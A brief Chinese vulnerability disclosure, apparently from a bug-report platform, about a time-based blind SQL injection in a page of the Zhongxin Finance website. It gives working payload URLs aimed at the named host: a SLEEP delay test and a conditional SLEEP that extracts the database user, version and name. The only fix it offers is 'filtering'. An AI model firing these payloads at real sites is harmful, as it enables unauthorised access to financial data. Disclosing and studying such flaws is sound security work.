金融安全之众信金融某站SQL注入漏洞
基于时间的盲注.http://am.imzhongxin.com/account/count.php?id=24。大哥说我是渣渣,连个时间盲注都搞不定.http://am.imzhongxin.com/account/count.php?id=24 AND (SELECT * FROM (SELECT(SLEEP(10)))x) 成功延时..
http://am.imzhongxin.com/account/count.php?id=24 and (SELECT * FROM (SELECT(SLEEP(3-(IF((select LENGTH(concat(user(),0x3a,version(),0x3a,database())))=31,0,3)))))CNfW)%23
赶紧修改了个tangscan的盲注脚本来处理这个问题.
执行concat(user(),0x3a,version(),0x3a,database())获取到的信息.
解决方案:过滤